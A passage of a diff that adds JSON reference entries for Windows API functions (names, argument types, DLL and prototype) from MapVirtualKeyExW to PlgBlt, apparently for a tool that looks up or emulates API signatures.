"UINT", + "HKL" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT MapVirtualKeyExW(UINT uCode, UINT uMapType, HKL dwhkl);" + }, + { + "function_name": "MapVirtualKeyW", + "arguments": [ + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT MapVirtualKeyW(UINT uCode, UINT uMapType);" + }, + { + "function_name": "MapWindowPoints", + "arguments": [ + "HWND", + "HWND", + "LPPOINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int MapWindowPoints(HWND hWndFrom, HWND hWndTo, LPPOINT lpPoints, UINT cPoints);" + }, + { + "function_name": "MaskBlt", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "HDC", + "int", + "int", + "HBITMAP", + "int", + "int", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL MaskBlt(HDC hdcDest, int nXDest, int nYDest, int nWidth,int nHeight, HDC hdcSrc, int nXSrc, int nYSrc, HBITMAP hbmMask, int xMask, int yMask, DWORD dwRop);" + }, + { + "function_name": "mciSendStringA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "UINT", + "HANDLE" + ], + "dll_name": "winmm.dll", + "full_prototype": "MCIERROR mciSendStringA(LPCTSTR lpszCommand, LPTSTR lpszReturnString, UINT cchReturn, HANDLE hwndCallback);" + }, + { + "function_name": "MenuItemFromPoint", + "arguments": [ + "HWND", + "HMENU", + "POINT" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT MenuItemFromPoint(HWND hWnd, HMENU hMenu, POINT ptScreen);" + }, + { + "function_name": "MessageBeep", + "arguments": [ + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL MessageBeep(UINT uType);" + }, + { + "function_name": "MessageBoxA", + "arguments": [ + "HWND", + "LPCTSTR", + "LPCTSTR", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int MessageBoxA(HWND hWnd, LPCTSTR lpText,LPCTSTR lpCaption,UINT uType);" + }, + { + "function_name": "MessageBoxExA", + "arguments": [ + "HWND", + "LPCTSTR", + "LPCTSTR", + "UINT", + "WORD" + ], + "dll_name": "user32.dll", + "full_prototype": "int MessageBoxExA(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType, WORD wLanguageId);" + }, + { + "function_name": "MessageBoxExW", + "arguments": [ + "HWND", + "LPCWSTR", + "LPCWSTR", + "UINT", + "WORD" + ], + "dll_name": "user32.dll", + "full_prototype": "int MessageBoxExW(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType, WORD wLanguageId);" + }, + { + "function_name": "MessageBoxIndirectA", + "arguments": [ + "LPMSGBOXPARAMS" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL MessageBoxIndirectA(LPMSGBOXPARAMS lpMsgBoxParams);" + }, + { + "function_name": "MessageBoxIndirectW", + "arguments": [ + "MSGBOXPARAMSW" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL MessageBoxIndirectW(MSGBOXPARAMSW lpMsgBoxParams);" + }, + { + "function_name": "MessageBoxW", + "arguments": [ + "HWND", + "LPCWSTR", + "LPCWSTR", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int MessageBoxW(HWND hWnd, LPCWSTR lpText,LPCWSTR lpCaption, UINT uType);" + }, + { + "function_name": "ModifyMenuA", + "arguments": [ + "HMENU", + "UINT", + "UINT", + "UINT", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ModifyMenuA(HMENU hMnu, UINT uPosition, UINT uFlags, UINT uIDNewItem, LPCTSTR lpNewItem);" + }, + { + "function_name": "ModifyMenuW", + "arguments": [ + "HMENU", + "UINT", + "UINT", + "UINT", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ModifyMenuW(HMENU hMnu, UINT uPosition, UINT uFlags, UINT uIDNewItem, LPCWSTR lpNewItem);" + }, + { + "function_name": "ModifyWorldTransform", + "arguments": [ + "HDC", + "CONST XFORM *", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL ModifyWorldTransform(HDC hdc,CONST XFORM * lpXform, DWORD iMode);" + }, + { + "function_name": "mouse_event", + "arguments": [ + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "VOID mouse_event(DWORD dwFlags, DWORD dx,DWORD dy, DWORD cButtons,DWORD dwExtraInfo);" + }, + { + "function_name": "MoveFileA", + "arguments": [ + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL MoveFileA(LPCTSTR lpExistingFileName,LPCTSTR lpNewFileName);" + }, + { + "function_name": "MoveFileExA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL MoveFileExA(LPCTSTR lpExistingFileName, LPCTSTR lpNewFileName, DWORD dwFlags);" + }, + { + "function_name": "MoveFileExW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL MoveFileExW(LPCWSTR source, LPCWSTR dest, DWORD flag);" + }, + { + "function_name": "MoveFileW", + "arguments": [ + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL MoveFileW(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName);" + }, + { + "function_name": "MoveToEx", + "arguments": [ + "HDC", + "int", + "int", + "LPPOINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL MoveToEx(HDC hdc, int X, int Y, LPPOINT lpPoint);" + }, + { + "function_name": "MoveWindow", + "arguments": [ + "HWND", + "int", + "int", + "int", + "int", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL MoveWindow(HWND hWnd,int X,int Y,int nWidth, int nHeight, BOOL bRepaint);" + }, + { + "function_name": "MsgWaitForMultipleObjects", + "arguments": [ + "DWORD", + "LPHANDLE", + "BOOL", + "DWORD", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD MsgWaitForMultipleObjects(DWORD nCount, LPHANDLE pHandles, BOOL fWaitAll, DWORD dwMilliseconds, DWORD dwWakeMask);" + }, + { + "function_name": "MsgWaitForMultipleObjectsEx", + "arguments": [ + "DWORD", + "const HANDLE", + "DWORD", + "DWORD", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD MsgWaitForMultipleObjectsEx(DWORD nCount, const HANDLE *pHandles, DWORD dwMilliseconds, DWORD dwWakeMask, DWORD dwFlags);" + }, + { + "function_name": "MulDiv", + "arguments": [ + "int", + "int", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int MulDiv(int nNumber, int nNumerator, int nDenominator);" + }, + { + "function_name": "MultiByteToWideChar", + "arguments": [ + "UINT", + "DWORD", + "LPCSTR", + "int", + "LPWSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int MultiByteToWideChar(UINT CodePage,DWORD dwFlags, LPCSTR lpMultiByteStr,int cchMultiByte, LPWSTR lpWideCharStr, int cchWideChar);" + }, + { + "function_name": "MultinetGetConnectionPerformanceA", + "arguments": [ + "LPNETRESOURCE", + "LPNETCONNECTINFOSTRUCT" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD MultinetGetConnectionPerformanceA(LPNETRESOURCE lpNetResource, LPNETCONNECTINFOSTRUCT lpNetConnectInfoStruct);" + }, + { + "function_name": "MultinetGetConnectionPerformanceW", + "arguments": [ + "LPNETRESOURCEW", + "LPNETCONNECTINFOSTRUCT" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD MultinetGetConnectionPerformanceW(LPNETRESOURCEW lpNetResource, LPNETCONNECTINFOSTRUCT lpNetConnectInfoStruct);" + }, + { + "function_name": "NotifyChangeEventLog", + "arguments": [ + "HANDLE", + "HANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL NotifyChangeEventLog( HANDLE hEventLog, HANDLE hEvent );" + }, + { + "function_name": "ObjectCloseAuditAlarmA", + "arguments": [ + "LPCTSTR", + "LPVOID", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ObjectCloseAuditAlarmA( LPCTSTR SubsystemName, LPVOID HandleId, BOOL GenerateOnClose );" + }, + { + "function_name": "ObjectCloseAuditAlarmW", + "arguments": [ + "LPCWSTR", + "LPVOID", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ObjectCloseAuditAlarmW(LPCWSTR SubsystemName, LPVOID HandleId, BOOL GenerateOnClose);" + }, + { + "function_name": "ObjectDeleteAuditAlarmA", + "arguments": [ + "LPCSTR", + "LPVOID", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ObjectDeleteAuditAlarmA(LPCSTR SubsystemName, LPVOID HandleId, BOOL GenerateOnClose);" + }, + { + "function_name": "ObjectDeleteAuditAlarmW", + "arguments": [ + "LPCWSTR", + "LPVOID", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ObjectDeleteAuditAlarmW(LPCWSTR SubsystemName,LPVOID HandleId,BOOL GenerateOnClose);" + }, + { + "function_name": "ObjectOpenAuditAlarmA", + "arguments": [ + "LPCTSTR", + "LPVOID", + "LPTSTR", + "LPTSTR", + "PSECURITY_DESCRIPTOR", + "HANDLE", + "DWORD", + "DWORD", + "PPRIVILEGE_SET", + "BOOL", + "BOOL", + "LPBOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ObjectOpenAuditAlarmA( LPCTSTR SubsystemName, LPVOID HandleId, LPTSTR ObjectTypeName, LPTSTR ObjectName, PSECURITY_DESCRIPTOR pSecurityDescriptor, HANDLE ClientToken, DWORD DesiredAccess, DWORD GrantedAccess, PPRIVILEGE_SET Privileges, BOOL ObjectCreation, BOOL AccessGranted, LPBOOL GenerateOnClose );" + }, + { + "function_name": "ObjectOpenAuditAlarmW", + "arguments": [ + "LPCWSTR", + "LPVOID", + "LPWSTR", + "LPWSTR", + "PSECURITY_DESCRIPTOR", + "HANDLE", + "DWORD", + "DWORD", + "PPRIVILEGE_SET", + "BOOL", + "BOOL", + "LPBOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ObjectOpenAuditAlarmW(LPCWSTR SubsystemName,LPVOID HandleId,LPWSTR ObjectTypeName,LPWSTR ObjectName,PSECURITY_DESCRIPTOR pSecurityDescriptor,HANDLE ClientToken,DWORD DesiredAccess,DWORD GrantedAccess,PPRIVILEGE_SET Privileges,BOOL ObjectCreation,BOOL AccessGranted,LPBOOL GenerateOnClose);" + }, + { + "function_name": "ObjectPrivilegeAuditAlarmA", + "arguments": [ + "LPCTSTR", + "LPVOID", + "HANDLE", + "DWORD", + "PPRIVILEGE_SET", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ObjectPrivilegeAuditAlarmA( LPCTSTR lpszSubsystem, LPVOID lpvHandleId, HANDLE hClientToken, DWORD dwDesiredAccess, PPRIVILEGE_SET pps, BOOL fAccessGranted );" + }, + { + "function_name": "ObjectPrivilegeAuditAlarmW", + "arguments": [ + "LPCWSTR", + "LPVOID", + "HANDLE", + "DWORD", + "PPRIVILEGE_SET", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ObjectPrivilegeAuditAlarmW( LPCWSTR SubsystemName,LPVOID HandleId,HANDLE ClientToken,DWORD DesiredAccess,PPRIVILEGE_SET Privileges,BOOL AccessGranted);" + }, + { + "function_name": "OemKeyScan", + "arguments": [ + "WORD" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD OemKeyScan(WORD wOemChar);" + }, + { + "function_name": "OemToCharA", + "arguments": [ + "LPCSTR", + "LPTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL OemToCharA(LPCSTR lpszOemStr, LPTSTR lpszStr);" + }, + { + "function_name": "OemToCharBuffA", + "arguments": [ + "LPCSTR", + "LPTSTR", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL OemToCharBuffA(LPCSTR lpOemStr, LPTSTR lpszStr, DWORD cchString);" + }, + { + "function_name": "OemToCharBuffW", + "arguments": [ + "LPCSTR", + "LPWSTR", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL OemToCharBuffW(LPCSTR lpOemStr, LPWSTR lpszStr, DWORD cchString);" + }, + { + "function_name": "OemToCharW", + "arguments": [ + "LPCSTR", + "LPWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL OemToCharW(LPCSTR lpszOemStr, LPWSTR lpszStr);" + }, + { + "function_name": "OffsetClipRgn", + "arguments": [ + "HDC", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int OffsetClipRgn(HDC hdc,int nXOffset, int nYOffset);" + }, + { + "function_name": "OffsetRect", + "arguments": [ + "LPRECT", + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL OffsetRect(LPRECT lprc, int x, int y);" + }, + { + "function_name": "OffsetRgn", + "arguments": [ + "HRGN", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int OffsetRgn(HRGN hrgn, int nXOffset, int nYOffset);" + }, + { + "function_name": "OffsetViewportOrgEx", + "arguments": [ + "HDC", + "int", + "int", + "LPPOINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL OffsetViewportOrgEx(HDC hdc,int nXOffset, int nYOffset, LPPOINT lpPoint);" + }, + { + "function_name": "OffsetWindowOrgEx", + "arguments": [ + "HDC", + "int", + "int", + "LPPOINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL OffsetWindowOrgEx(HDC hdc, int nXOffset, int nYOffset, LPPOINT lpPoint);" + }, + { + "function_name": "OpenBackupEventLogA", + "arguments": [ + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "HANDLE OpenBackupEventLogA( LPCTSTR lpszUNCServerName, LPCTSTR lpszFileName );" + }, + { + "function_name": "OpenBackupEventLogW", + "arguments": [ + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "HANDLE OpenBackupEventLogW( LPCWSTR lpUNCServerName, LPCWSTR lpFileName );" + }, + { + "function_name": "OpenClipboard", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL OpenClipboard(HWND hwnd);" + }, + { + "function_name": "OpenDesktopA", + "arguments": [ + "LPCTSTR", + "DWORD", + "BOOL", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HDESK OpenDesktopA(LPCTSTR lpszDesktopName, DWORD dwFlags, BOOL fInherit, DWORD dwDesiredAccess);" + }, + { + "function_name": "OpenDesktopW", + "arguments": [ + "LPWSTR", + "DWORD", + "BOOL", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HDESK OpenDesktopW(LPWSTR lpszDesktopName, DWORD dwFlags, BOOL fInherit, DWORD dwDesiredAccess);" + }, + { + "function_name": "OpenEventA", + "arguments": [ + "DWORD", + "BOOL", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE OpenEventA(DWORD fdwAccess, BOOL fInherit,LPCTSTR lpszEventName);" + }, + { + "function_name": "OpenEventW", + "arguments": [ + "DWORD", + "BOOL", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE OpenEventW(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCWSTR lpName);" + }, + { + "function_name": "OpenEventLogA", + "arguments": [ + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "HANDLE OpenEventLogA( LPCTSTR lpszUNCServerName, LPCTSTR lpszSourceName );" + }, + { + "function_name": "OpenEventLogW", + "arguments": [ + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "HANDLE OpenEventLogW( LPCWSTR uncname, LPCWSTR source );" + }, + { + "function_name": "OpenFile", + "arguments": [ + "LPCSTR", + "LPOFSTRUCT", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HFILE OpenFile( LPCSTR lpszFile, LPOFSTRUCT lpOpenBuff, UINT fuMode );" + }, + { + "function_name": "OpenFileMappingA", + "arguments": [ + "DWORD", + "BOOL", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE OpenFileMappingA(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCTSTR lpName);" + }, + { + "function_name": "OpenFileMappingW", + "arguments": [ + "DWORD", + "BOOL", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE OpenFileMappingW(DWORD access, BOOL inherit, LPCWSTR name);" + }, + { + "function_name": "OpenIcon", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL OpenIcon(HWND hwnd);" + }, + { + "function_name": "OpenInputDesktop", + "arguments": [ + "DWORD", + "BOOL", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HDESK OpenInputDesktop(DWORD dwFlags, BOOL fInherit, DWORD dwDesiredAccess);" + }, + { + "function_name": "OpenMutexA", + "arguments": [ + "DWORD", + "BOOL", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE OpenMutexA(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCTSTR lpName);" + }, + { + "function_name": "OpenMutexW", + "arguments": [ + "DWORD", + "BOOL", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE OpenMutexW(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCWSTR lpName);" + }, + { + "function_name": "OpenPrinterA", + "arguments": [ + "LPTSTR", + "LPHANDLE", + "LPPRINTER_DEFAULTS" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL OpenPrinterA(LPTSTR pPrinterName, LPHANDLE phPrinter, LPPRINTER_DEFAULTS pDefault);" + }, + { + "function_name": "OpenProcess", + "arguments": [ + "DWORD", + "BOOL", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);" + }, + { + "function_name": "OpenProcessToken", + "arguments": [ + "HANDLE", + "DWORD", + "PHANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL OpenProcessToken( HANDLE hProcess, DWORD dwAccessMask, PHANDLE phToken );" + }, + { + "function_name": "OpenSemaphoreA", + "arguments": [ + "DWORD", + "BOOL", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE OpenSemaphoreA(DWORD fdwAccess, BOOL fInherit,LPCTSTR lpszSemName);" + }, + { + "function_name": "OpenSemaphoreW", + "arguments": [ + "DWORD", + "BOOL", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE OpenSemaphoreW(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCWSTR lpName);" + }, + { + "function_name": "OpenThreadToken", + "arguments": [ + "HANDLE", + "DWORD", + "BOOL", + "PHANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL OpenThreadToken( HANDLE hThread, DWORD dwAccessMask, BOOL fOpenAsSelf, PHANDLE phToken );" + }, + { + "function_name": "OpenWaitableTimerA", + "arguments": [ + "DWORD", + "BOOL", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE OpenWaitableTimerA(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCTSTR lpTimerName);" + }, + { + "function_name": "OpenWaitableTimerW", + "arguments": [ + "DWORD", + "BOOL", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE OpenWaitableTimerW(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCWSTR lpTimerName);" + }, + { + "function_name": "OpenWindowStationA", + "arguments": [ + "LPCTSTR", + "BOOL", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HWINSTA OpenWindowStationA(LPCTSTR lpszWinStaName,BOOL fInherit, DWORD dwDesiredAccess);" + }, + { + "function_name": "OpenWindowStationW", + "arguments": [ + "LPWSTR", + "BOOL", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HWINSTA OpenWindowStationW(LPWSTR lpszWinStaName,BOOL fInherit, DWORD dwDesiredAccess);" + }, + { + "function_name": "OutputDebugStringA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID OutputDebugStringA(LPCTSTR lpszOutputString);" + }, + { + "function_name": "OutputDebugStringW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID OutputDebugStringW(LPCWSTR str);" + }, + { + "function_name": "PackDDElParam", + "arguments": [ + "UINT", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG PackDDElParam(UINT uMsg, UINT uLow, UINT uHigh);" + }, + { + "function_name": "PaintDesktop", + "arguments": [ + "HDC" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL WINAPI PaintDesktop(HDC hdc);" + }, + { + "function_name": "PaintRgn", + "arguments": [ + "HDC", + "HRGN" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PaintRgn(HDC hdc, HRGN hrgn);" + }, + { + "function_name": "PatBlt", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PatBlt(HDC hdc, int nXLeft, int nYLeft, int nWidth, int nHeight, DWORD dwRop);" + }, + { + "function_name": "PathAddBackslashA", + "arguments": [ + "LPSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "LPSTR PathAddBackslashA(LPSTR lpszPath);" + }, + { + "function_name": "PathAddExtension", + "arguments": [ + "LPTSTR", + "LPCTSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathAddExtension(LPTSTR pszPath, LPCTSTR pszExtension);" + }, + { + "function_name": "PathAppendA", + "arguments": [ + "LPSTR", + "LPCSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathAppendA(LPSTR lpszPath, LPCSTR lpszAppend);" + }, + { + "function_name": "PathBuildRootA", + "arguments": [ + "LPSTR", + "int" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "LPSTR PathBuildRootA(LPSTR lpszPath, int drive);" + }, + { + "function_name": "PathCanonicalizeA", + "arguments": [ + "LPSTR", + "LPCSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathCanonicalizeA( LPSTR lpszBuf, LPCSTR lpszPath);" + }, + { + "function_name": "PathCombine", + "arguments": [ + "LPTSTR", + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "LPTSTR PathCombine(LPTSTR lpszDest, LPCTSTR lpszDir, LPCTSTR lpszFile);" + }, + { + "function_name": "PathCommonPrefix", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPTSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "int PathCommonPrefix(LPCTSTR pszFile1, LPCTSTR pszFile2, LPTSTR pszPath);" + }, + { + "function_name": "PathCompactPathA", + "arguments": [ + "HDC", + "LPSTR", + "UINT" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathCompactPathA( HDC hDC, LPSTR lpszPath, UINT dx);" + }, + { + "function_name": "PathCompactPathExA", + "arguments": [ + "LPSTR", + "LPCSTR", + "UINT", + "DWORD" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathCompactPathExA(LPSTR lpszDest,LPCSTR lpszPath, UINT cchMax, DWORD dwFlags);" + }, + { + "function_name": "PathCreateFromUrlA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "LPDWORD", + "DWORD" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "HRESULT PathCreateFromUrlA( LPCTSTR pszUrl, LPTSTR pszPath, LPDWORD pcchPath, DWORD dwReserved);" + }, + { + "function_name": "PathFindOnPathA", + "arguments": [ + "LPTSTR", + "LPCTSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathFindOnPathA(LPTSTR pszFile, LPCTSTR *ppszOtherDirs);" + }, + { + "function_name": "PathGetDriveNumberA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "int PathGetDriveNumberA(LPCTSTR lpsz);" + }, + { + "function_name": "PathIsDirectoryEmptyA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathIsDirectoryEmptyA(LPCTSTR pszPath);" + }, + { + "function_name": "PathIsSystemFolder", + "arguments": [ + "LPCTSTR", + "DWORD" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathIsSystemFolder(LPCTSTR pszPath, DWORD dwAttrb);" + }, + { + "function_name": "PathIsUNCA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathIsUNCA(LPCTSTR pszPath);" + }, + { + "function_name": "PathIsUNCServerA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathIsUNCServerA( LPCTSTR pszPath);" + }, + { + "function_name": "PathIsURLA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathIsURLA(LPCTSTR pszPath);" + }, + { + "function_name": "PathToRegion", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HRGN PathToRegion(HDC hdc);" + }, + { + "function_name": "PathUndecorateA", + "arguments": [ + "LPTSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "void PathUndecorateA(LPTSTR pszPath);" + }, + { + "function_name": "PathUnmakeSystemFolderA", + "arguments": [ + "LPTSTR" + ], + "dll_name": "shlwapi.dll", + "full_prototype": "BOOL PathUnmakeSystemFolderA(LPTSTR pszPath);" + }, + { + "function_name": "PeekConsoleInputA", + "arguments": [ + "HANDLE", + "PINPUT_RECORD", + "DWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL PeekConsoleInputA(HANDLE hConsoleInput, PINPUT_RECORD pirBuffer,DWORD cInRecords, LPDWORD lpcRead);" + }, + { + "function_name": "PeekConsoleInputW", + "arguments": [ + "HANDLE", + "PINPUT_RECORD", + "DWORD", + "PDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL PeekConsoleInputW(HANDLE hConsoleInput,PINPUT_RECORD pirBuffer,DWORD cInRecords,PDWORD lpcRead);" + }, + { + "function_name": "PeekMessageA", + "arguments": [ + "LPMSG", + "HWND", + "UINT", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL PeekMessageA(LPMSG lpMsg, HWND hWnd, UINT uMsgFilterMin, UINT uMsgFilterMax, UINT wRemoveMsg);" + }, + { + "function_name": "PeekMessageW", + "arguments": [ + "LPMSG", + "HWND", + "UINT", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL PeekMessageW(LPMSG lpMsg, HWND hWnd, UINT uMsgFilterMin, UINT uMsgFilterMax, UINT wRemoveMsg);" + }, + { + "function_name": "PeekNamedPipe", + "arguments": [ + "HANDLE", + "LPVOID", + "DWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL PeekNamedPipe(HANDLE hPipe, LPVOID lpvBuffer, DWORD cbBuffer,LPDWORD lpcbRead, LPDWORD lpcbAvail, LPDWORD lpcbMessage);" + }, + { + "function_name": "Pie", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL Pie(HDC hdc, int nLeftRect, int nTopRect, int nRightRect, int nBottomRect, int nXRadial1, int nYRadial1, int nXRadial2,int nYRadial2);" + }, + { + "function_name": "PlayEnhMetaFile", + "arguments": [ + "HDC", + "HENHMETAFILE", + "CONST RECT *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PlayEnhMetaFile(HDC hdc, HENHMETAFILE hemf, CONST RECT * lpRect);" + }, + { + "function_name": "PlayEnhMetaFileRecord", + "arguments": [ + "HDC", + "LPHANDLETABLE", + "CONST ENHMETARECORD *", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PlayEnhMetaFileRecord(HDC hdc, LPHANDLETABLE lpHandletable, CONST ENHMETARECORD * lpEnhMetaRecord, UINT nHandles);" + }, + { + "function_name": "PlayMetaFile", + "arguments": [ + "HDC", + "HMETAFILE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PlayMetaFile(HDC hdc, HMETAFILE hmf);" + }, + { + "function_name": "PlayMetaFileRecord", + "arguments": [ + "HDC", + "LPHANDLETABLE", + "LPMETARECORD", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PlayMetaFileRecord(HDC hdc, LPHANDLETABLE lpHandletable, LPMETARECORD lpMetaRecord, UINT nHandles);" + }, + { + "function_name": "PlaySoundA", + "arguments": [ + "LPCSTR", + "HMODULE", + "DWORD" + ], + "dll_name": "winmm.dll", + "full_prototype": "BOOL PlaySoundA(LPCSTR pszSound, HMODULE hmod, DWORD fdwSound);" + }, + { + "function_name": "PlgBlt", + "arguments": [ + "HDC", + "CONST POINT *", + "HDC", + "int", + "int", + "int", + "int", + "HBITMAP", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL 